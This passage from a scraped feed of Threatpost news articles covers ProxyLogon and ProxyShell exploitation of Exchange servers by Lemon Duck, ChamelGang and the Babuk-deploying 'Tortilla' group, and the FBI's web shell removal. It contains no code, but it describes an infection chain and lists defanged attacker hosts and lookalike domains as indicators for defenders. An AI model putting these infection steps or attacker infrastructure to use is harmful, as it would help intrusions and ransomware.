Duck is not the first cryptomining malware to add ProxyLogon to its arsenal. For instance, another cryptojacking group [was seen in mid-April](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) doing the same thing.\n\nThat bad code was fairly simple, but also in mid-April a heretofore little-seen Monero-mining botnet [dubbed Prometei](<https://threatpost.com/prometei-botnet-apt-attacks/165574/>) began exploiting two of the Microsoft Exchange vulnerabilities in ProxyLogon. This malware is also highly complex and sophisticated, Cybereason researchers noted at the time. While cryptojacking is its current game, researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\nThe threat will likely continue to evolve, Cisco Talos researchers said. They also observed domains linked to Lemon Duck and another cryptocurrency miner, DLTMiner, used in relation to Microsoft Exchange attacks where ransomware was also deployed.\n\n\u201cAt this time, there doesn\u2019t appear to be a link between the Lemon Duck components observed there and the reported ransomware (TeslaRVNG2),\u201d according to the analysis. \u201cThis suggests that given the nature of the vulnerabilities targeted, we are likely to continue to observe a range of malicious activities in parallel, using similar exploitation techniques and infection vectors to compromise systems. In some cases, attackers may take advantage of artifacts left in place from prior compromises, making distinction more difficult.\u201d\n\nMeanwhile, it\u2019s clear that the threat actor behind Lemon Duck is continuously evolving its approach to maximize the ability to achieve its mission objectives, researchers noted.\n\n\u201cLemon Duck continues to launch campaigns against systems around the world, attempting to leverage infected systems to mine cryptocurrency and generate revenue for the adversary behind this botnet,\u201d they concluded. \u201cThe use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments. \u2026 Organizations should remain vigilant against this threat, as it will likely continue to evolve.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-10T17:37:44", "type": "threatpost", "title": "Lemon Duck Cryptojacking Botnet Changes Up Tactics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-10T17:37:44", "id": "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "href": "https://threatpost.com/lemon-duck-cryptojacking-botnet-tactics/165986/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-15T09:53:19", "description": "The Feds have cleared malicious web shells from hundreds of vulnerable computers in the United States that had been compromised via the now-infamous ProxyLogon Microsoft Exchange vulnerabilities.\n\nProxyLogon comprises a group of security bugs affecting on-premises versions of Microsoft Exchange Server software for email. Microsoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile patching levels have accelerated, this doesn\u2019t help already-compromised computers.\n\n\u201cMany infected system owners successfully removed the web shells from thousands of computers,\u201d explained the Department of Justice, in a [Tuesday announcement](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>). \u201cOthers appeared unable to do so, and hundreds of such web shells persisted unmitigated.\u201d\n\nThis state of affairs prompted the FBI to take action; in a court-authorized action, it issued a series of commands through the web shells to the affected servers. The commands were designed to cause the server to delete only the web shells (identified by their unique file path). It didn\u2019t notify affected organizations ahead of time, but authorities said they\u2019re sending out notices now.\n\n\u201cToday\u2019s court-authorized removal of the malicious web shells demonstrates the Department\u2019s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,\u201d said Assistant Attorney General John Demers for the DoJ\u2019s National Security Division, in the statement.\n\n## **Unilateral FBI Action Against ProxyLogon Exploits**\n\nOther technical details of the action are being kept under wraps, but Erkang Zheng, founder and CEO at JupiterOne, noted that the action is unprecedented.\n\n\u201cWhat makes this really interesting is the court ordered remote remediation of vulnerable systems,\u201d he said via email. \u201cThis is the first time that this has happened and with this as a precedent, it likely won\u2019t be the last. Many enterprises today have no idea what their infrastructure and security state looks like \u2013 visibility is a huge problem for CISOs.\u201d\n\nDirk Schrader, global vice president of security research at New Net Technologies, noted that the FBI\u2019s lack of transparency could be problematic.\n\n\u201cThere are a few critical issues in this,\u201d he told Threatpost. \u201cOne is the FBI stating the action was because these victims lack the technical ability to clear their infrastructure themselves, another is that it seems the FBI intends to delay informing the victims about the removal itself by at least a month, citing ongoing investigations as a reason.\u201d\n\nHe explained, \u201cThis can cause other issues, as the victims have no chance to investigate what kind of information has been accessed, whether additional backdoors where installed, and a range of other concerns come with this approach.\u201d\n\nMonti Knode, director of customer and partner success at Horizon3.AI, noted that the action illuminates just how dangerous the bugs are.\n\n\u201cGovernment action is always predicated by an authority to act,\u201d he said via email. \u201cBy specifically calling out \u2018protected computers\u2019 and declaring them \u2018damaged\u2019, that appears to have been enough to give the FBI a signed warrant to execute such an operation without notifying victims ahead of the operation execution. While the scale of the operation is unknown (redacted in court order), the fact that the FBI was able to execute in less than four days, and then publicly release this effort, demonstrates the potential national security risk posed by these exploited systems and the prioritized planning involved. This isn\u2019t a knee-jerk reaction.\u201d\n\nThis operation was successful in copying and removing the web shells, the FBI reported. However, organizations still need to patch if they haven\u2019t yet done so.\n\n\u201cCombined with the private sector\u2019s and other government agencies\u2019 efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country\u2019s cybersecurity,\u201d Denmers said. \u201cThere\u2019s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.\u201d\n\n## New Exchange RCE Bugs and a Federal Warning\n\nThe news comes on the heels of [April Patch Tuesday](<https://threatpost.com/microsoft-april-patch-tuesday-zero-days/165393/>), in which Microsoft revealed more RCE vulnerabilities in Exchange (CVE-2021-28480 through CVE-2021-28483), which were discovered and reported by the National Security Agency. A [mandate to federal agencies](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>) to patch them by Friday also went out.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber-threat research, warned that weaponization of these may come faster than usual, since motivated attackers will be able to use existing concept code.\n\n\u201cThis underlines the criticality of cybersecurity now to entire nations, as well as the continued blurring of the lines between nation-states, intelligence services and enterprise security,\u201d he added via email. \u201cWith a number of high-profile attacks affecting well-used enterprise software recently, the NSA are obviously keen to step up and play a proactive role.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "cvss3": {}, "published": "2021-04-14T17:31:13", "type": "threatpost", "title": "FBI Clears ProxyLogon Web Shells from Hundreds of Orgs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-14T17:31:13", "id": "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "href": "https://threatpost.com/fbi-proxylogon-web-shells/165400/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-01T12:44:45", "description": "A new APT group has emerged that\u2019s specifically targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server\u2019s [ProxyShell](<https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/>) and leveraging both new and existing malware to compromise networks.\n\nResearchers at security firm [Positive Technologies](<https://www.ptsecurity.com/ww-en/>) have been tracking the group, dubbed ChamelGang for its chameleon-like capabilities, since March. Though attackers mainly have been seen targeting Russian organizations, they have attacked targets in 10 countries so far, researchers said in a [report](<https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/>) by company researchers Aleksandr Grigorian, Daniil Koloskov, Denis Kuvshinov and Stanislav Rakovsky published online Thursday.\n\nTo avoid detection, ChamelGang hides its malware and network infrastructure under legitimate services of established companies like Microsoft, TrendMicro, McAfee, IBM and Google in a couple of unique ways, researchers observed.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nOne is to acquire domains that imitate their legitimate counterparts \u2013 such as newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com and mcafee-upgrade.com. The other is to place SSL certificates that also imitate legitimate ones \u2013 such as github.com, www.ibm.com, jquery.com, update.microsoft-support.net \u2013 on its servers, researchers said.\n\nMoreover, ChamelGang \u2013 like [Nobelium](<https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/>) and [REvil](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) before it \u2013 has hopped on the bandwagon of attacking the supply chain first to gain access to its ultimate target, they said. In one of the cases analyzed by Positive Technologies, \u201cthe group compromised a subsidiary and penetrated the target company\u2019s network through it,\u201d according to the writeup.\n\nThe attackers also appear malware-agnostic when it comes to tactics, using both known malicious programs such as [FRP](<https://howtofix.guide/frp-exe-virus/>), [Cobalt Strike Beacon](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), and Tiny Shell, as well as previously unknown malware ProxyT, BeaconLoader and the DoorMe backdoor, researchers said.\n\n## **Two Separate Attacks**\n\nResearchers analyzed two attacks by the novel APT: one in March and one in August. The first investigation was triggered after a Russia-based energy company\u2019s antivirus protection repeatedly reported the presence of the Cobalt Strike Beacon in RAM.\n\nAttackers gained access to the energy company\u2019s network through the supply chain, compromising a vulnerable version of a subsidiary company\u2019s web application on the JBoss Application Server. Upon investigation, researchers found that attackers exploited a critical vulnerability, [CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>), to remotely execute commands on the host.\n\nOnce on the energy company\u2019s network, ChamelGang moved laterally, deploying a number of tools along the way. They included Tiny Shell, with which a UNIX backdoor can receive a shell from an infected host, execute a command and transfer files; an old DLL hijacking technique associated with the Microsoft Distributed Transaction Control (MSDTC) Windows service to gain persistence and escalate privileges; and the Cobalt Strike Beacon for calling back to attackers for additional commands.\n\nResearchers were successful in accessing and exfiltrating data in the attack, researchers said. \u201cAfter collecting the data, they placed it on web servers on the compromised network for further downloading \u2026 using the Wget utility,\u201d they wrote.\n\n## **Cutting Short a ProxyShell Attack **\n\nThe second attack was on an organization from the Russian aviation production sector, researchers said. They notified the company four days after the server was compromised, working with employees to eliminate the threat shortly after.\n\n\u201cIn total, the attackers remained in the victim\u2019s network for eight days,\u201d researchers wrote. \u201cAccording to our data, the APT group did not expect that its backdoors would be detected so quickly, so it did not have time to develop the attack further.\u201d\n\nIn this instance, ChamelGang used a known chain of vulnerabilities in Microsoft Exchange called ProxyShell \u2013 CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 \u2013 to compromise network nodes and gain a foothold. Indeed, a number of attackers took advantage of ProxyShell throughout August, [pummeling](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) unpatched Exchange servers with attacks after a [researcher at BlackHat revealed](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) the attack surface.\n\nOnce on the network, attackers then installed a modified version of the backdoor DoorMe v2 on two Microsoft Exchange mail servers on the victim\u2019s network. Attackers also used BeaconLoader to move inside the network and infect nodes, as well as the Cobalt Strike Beacon.\n\n## **Victims Across the Globe**\n\nFurther threat intelligence following the investigation into attacks on the Russian companies revealed that ChamelGang\u2019s activity has not been limited to that country.\n\nPositive Technologies eventually identified 13 more compromised organizations in nine other countries \u2013 the U.S., Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania and Nepal. In the last four countries mentioned, attackers targeted government servers, they added.\n\nAttackers often used ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server against victims, who were all notified by the appropriate national security authorities in their respective countries.\n\nChamelGang\u2019s tendency to reach its targets through the supply chain also is likely one that it \u2013 as well as other APTs \u2013 will continue, given the success attackers have had so far with this tactic, researchers added. \u201cNew APT groups using this method to achieve their goals will appear on stage,\u201d they said.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-01T12:36:25", "type": "threatpost", "title": "New APT ChamelGang Targets Russian Energy, Aviation Orgs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-01T12:36:25", "id": "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "href": "https://threatpost.com/apt-chamelgang-targets-russian-energy-aviation/175272/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T16:00:33", "description": "A new-ish threat actor sometimes known as \u201cTortilla\u201d is launching a fresh round of ProxyShell attacks on Microsoft Exchange servers, this time with the aim of inflicting vulnerable servers with variants of the Babuk ransomware.\n\nCisco Talos researchers said in a Wednesday [report](<https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) that they spotted the malicious campaign a few weeks ago, on Oct. 12.\n\nTortilla, an actor that\u2019s been operating since July, is predominantly targeting U.S. victims. It\u2019s also hurling a smaller number of infections that have hit machines in the Brazil, Finland, Germany, Honduras, Thailand, Ukraine and the U.K., as shown on the map below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03120718/ProxShell-Babuk-map-e1635955653968.jpeg>)\n\nVictim distribution map. Source: Cisco Talos.\n\nPrior to this ransomware-inflicting campaign, Tortilla has been experimenting with other payloads, such as the PowerShell-based netcat clone PowerCat.\n\nPowerCat has a penchant for Windows, the researchers explained, being \u201cknown to provide attackers with unauthorized access to Windows machines.\u201d\n\n## ProxyShell\u2019s New Attack Surface\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>)..\n\nIn this latest ProxyShell campaign, Cisco Talos researchers said that the threat actor is using \u201ca somewhat unusual infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone pastebin.pl\u201d to deliver Babuk.\n\nThey continued: \u201cThe intermediate unpacking stage is downloaded and decoded in memory before the final payload embedded within the original sample is decrypted and executed.\u201d\n\n## Who\u2019s Babuk?\n\nBabuk is a ransomware that\u2019s probably best known for its starring role in a breach of the Washington D.C. police force [in April](<https://threatpost.com/babuk-ransomware-washington-dc-police/165616/>). The gang behind the malware has a short history, having only been [identified in 2021](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>), but that history shows that it\u2019s a [double-extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) player: one that threatens to post stolen data in addition to encrypting files, as a way of applying thumbscrews so victims will pay up.\n\nThat tactic has worked. As [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>) described in February, Babuk the ransomware had already been lobbed at a batch of at least five big enterprises, with one score: The gang walked away with $85,000 after one of those targets ponied up the money, McAfee researchers said.\n\nIts victims have included Serco, an outsourcing firm that confirmed that it had been [slammed](<https://www.computerweekly.com/news/252495684/Serco-confirms-Babuk-ransomware-attack>) with a double-extortion ransomware attack in late January.\n\nLike many ransomware strains, Babuk is ruthless: It not only encrypts a victim\u2019s machine, it also [blows up backups](<https://threatpost.com/conti-ransomware-backups/175114/>) and deletes the volume shadow copies, Cisco Talos said.\n\n## What\u2019s Under Babuk\u2019s Hood\n\nOn the technical side, Cisco Talos described Babuk as a flexible ransomware that can be compiled, through a ransomware builder, for several hardware and software platforms.\n\nIt\u2019s mostly compiled for Windows and ARM for Linux, but researchers said that, over time, they\u2019ve also seen versions for ESX and a 32-bit, old PE executable.\n\nIn this recent October campaign though, the threat actors are specifically targeting Windows.\n\n## China Chopper Chops Again\n\nPart of the infection chain involves China Chopper: A webshell that dates back to 2010 but which has [clung to relevancy since](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), including reportedly being used in a massive 2019 attack against telecommunications providers called [Operation Soft Cell](<https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>). The webshell enables attackers to \u201cretain access to an infected system using a client-side application which contains all the logic required to control the target,\u201d as Cisco Talos [described](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) the webshell in 2019.\n\nThis time around, it\u2019s being used to get to Exchange Server systems. \u201cWe assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,\u201d according to the Cisco Talos writeup.\n\n## The Infection Chain\n\nAs shown in the infection flow chart below, the actors are using either a DLL or .NET executable to kick things off on the targeted system. \u201cThe initial .NET executable module runs as a child process of w3wp.exe and invokes the command shell to run an obfuscated PowerShell command,\u201d according to Cisco Talos\u2019 report.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03130541/infection-flow-chart-e1635959155173.jpeg>)\n\nInfection flow chart. Source: Cisco Talos.\n\n\u201cThe PowerShell command invokes a web request and downloads the payload loader module using certutil.exe from a URL hosted on the domains fbi[.]fund and xxxs[.]info, or the IP address 185[.]219[.]52[.]229,\u201d researchers said.\n\n\u201cThe payload loader downloads an intermediate unpacking stage from the PasteBin clone site pastebin.pl,\u201d they continued \u2013 a site that \u201cseems to be unrelated to the popular pastebin.com.\u201d\n\nThey continued: \u201cThe unpacker concatenates the bitmap images embedded in the resource section of the trojan and decrypts the payload into the memory. The payload is injected into the process AddInProcess32 and is used to encrypt files on the victim\u2019s server and all mounted drives.\u201d\n\n## More Ingredients in Tortilla\u2019s Infrastructure\n\nBesides the pastebin.pl site that hosts Tortilla\u2019s intermediate unpacker code, Tortilla\u2019s infrastructure also includes a Unix-based download server.\n\nThe site is legitimate, but Cisco Talos has seen multiple malicious campaigns running on it, including hosting variants of the [AgentTesla trojan](<https://threatpost.com/agent-tesla-microsoft-asmi/163581/>) and the [FormBook malware dropper.](<https://threatpost.com/new-formbook-dropper-harbors-persistence/145614/>)\n\n## Babuk\u2019s Code Spill Helps Newbies\n\nIn July, Babuk gang\u2019s source code and builder were spilled: They were [uploaded to VirusTotal](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>), making it available to all security vendors and competitors. That leak has helped the ransomware spread to even an inexperienced, green group like Tortilla, Cisco Talos said.\n\nThe leak \u201cmay have encouraged new malicious actors to manipulate and deploy the malware,\u201d researchers noted.\n\n\u201cThis actor has only been operating since early July this year and has been experimenting with different payloads, apparently in order to obtain and maintain remote access to the infected systems,\u201d according to its writeup.\n\nWith Babuk source code readily available, all the Tortilla actors have to know is how to tweak it a tad, researchers said: A scenario that observers predicted back when the code appeared.\n\n\u201cThe actor displays low to medium skills with a decent understanding of the security concepts and the ability to create minor modifications to existing malware and offensive security tools,\u201d Cisco Talos researchers said in assessing the Tortilla gang.\n\n## Decryptor Won\u2019t Work on Variant\n\nWhile a free [Babuk decryptor was released](<https://www.bleepingcomputer.com/news/security/babuk-ransomware-decryptor-released-to-recover-files-for-free/>) last week, it won\u2019t work on the Babuk variant seen in this campaign, according to the writeup: \u201cUnfortunately, it is only effective on files encrypted with a number of leaked keys and cannot be used to decrypt files encrypted by the variant described in this blog post.\u201d\n\n## How to Keep Exchange Safe\n\nTortilla is hosting malicious modules and conducting internet-wide scanning to exploit vulnerable hosts.\n\nThe researchers recommended staying vigilant, staying on top of any infection in its early stages and implementing a layered defense security, \u201cwith the behavioral protection enabled for endpoints and servers to detect the threats at an early stage of the infection chain.\u201d\n\nThey also recommended keeping servers and apps updated so as to squash vulnerabilities, such as the trio of CVEs exploited in the ProxyShell attacks.\n\nAlso, keep an eye out for backup demolition, as the code deletes shadow copies: \u201cBabuk ransomware is nefarious by its nature and while it encrypts the victim\u2019s machine, it interrupts the system backup process and deletes the volume shadow copies,\u201d according to Cisco Talos.\n\nOn top of all that, bolster detection: Watch out for system configuration changes, suspicious events generated by detection systems for an abrupt service termination, or abnormally high I/O rates for drives attached to servers, according to Cisco Talos.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-03T18:16:37", "type": "threatpost", "title": "\u2018Tortilla\u2019 Wraps Exchange Servers in ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-43267"], "modified": "2021-11-03T18:16:37", "id": "THREATPOST:52923238811C7BFD39E0529C85317249", "href": "https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T19:26:48", "description": "Researchers\u2019 Microsoft Exchange server honeypots are being actively exploited via ProxyShell: The name of an attack disclosed at Black Hat last week that chains three vulnerabilities to enable unauthenticated attackers to perform remote code execution (RCE) and snag plaintext passwords.\n\nIn his Black Hat [presentation](<https://www.blackhat.com/us-21/briefings/schedule/#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-m>) last week, Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) said that a survey shows more than 400,000 Exchange servers on the internet that are exposed to the attack via port 443. On Monday, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that he found more than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find it a snap to pull off, given how much information is available.\n\nGoing by calculations tweeted by security researcher Kevin Beaumont, this means that, between ProxyLogon and ProxyShell, \u201cjust under 50 percent of internet-facing Exchange servers\u201d are currently vulnerable to exploitation, according to a Shodan search.\n\n> Breakdown of Exchange servers on Shodan vulnerable to ProxyShell or ProxyLogon, it's just under 50% of internet facing Exchange servers. [pic.twitter.com/3samyNHBpB](<https://t.co/3samyNHBpB>)\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 13, 2021](<https://twitter.com/GossiTheDog/status/1426207905779527682?ref_src=twsrc%5Etfw>)\n\nOn the plus side, Microsoft has already released patches for all of the vulnerabilities in question, and, cross your fingers, \u201cchances are that most organizations that take security at least somewhat seriously have already applied the patches,\u201d Kopriva wrote.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe vulnerabilities affect Exchange Server 2013, 2016 and 2019.\n\nOn Thursday, Beaumont and NCC Group\u2019s vulnerability researcher Rich Warren disclosed that threat actors have exploited their Microsoft Exchange honeypots using the ProxyShell vulnerability.\n\n\u201cStarted to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\u201d Warren tweeted, along with a screen capture of the code for a c# aspx webshell dropped in the /aspnet_client/ directory.\n\n> Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities. This one dropped a c# aspx webshell in the /aspnet_client/ directory: [pic.twitter.com/XbZfmQQNhY](<https://t.co/XbZfmQQNhY>)\n> \n> \u2014 Rich Warren (@buffaloverflow) [August 12, 2021](<https://twitter.com/buffaloverflow/status/1425831100157349890?ref_src=twsrc%5Etfw>)\n\nBeaumont [tweeted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) that he was seeing the same and connected it to Tsai\u2019s talk: \u201cExchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from @orange_8361\u2019s initial talk.\u201d\n\n> Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from [@orange_8361](<https://twitter.com/orange_8361?ref_src=twsrc%5Etfw>)'s initial talk.\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 12, 2021](<https://twitter.com/GossiTheDog/status/1425844380376735746?ref_src=twsrc%5Etfw>)\n\n## Dangerous Skating on the New Attack Surface\n\nIn [a post](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) on Sunday, Tsai recounted the in-the-wild ProxyLogon proof of concept that Devco reported to MSRC in late February, explaining that it made the researchers \u201cas curious as everyone after eliminating the possibility of leakage from our side through a thorough investigation.\n\n\u201cWith a clearer timeline appearing and more discussion occurring, it seems like this is not the first time that something like this happened to Microsoft,\u201d he continued. Mail server is both a highly valuable asset and a seemingly irresistible target for attackers, given that it holds businesses\u2019 confidential secrets and corporate data.\n\n\u201cIn other words, controlling a mail server means controlling the lifeline of a company,\u201d Tsai explained. \u201cAs the most common-use email solution, Exchange Server has been the top target for hackers for a long time. Based on our research, there are more than four hundred thousands Exchange Servers exposed on the Internet. Each server represents a company, and you can imagine how horrible it is while a severe vulnerability appeared in Exchange Server.\u201d\n\nDuring his Black Hat presentation, Tsai explained that the new attack surface his team discovered is based on \u201ca significant change in Exchange Server 2013, where the fundamental 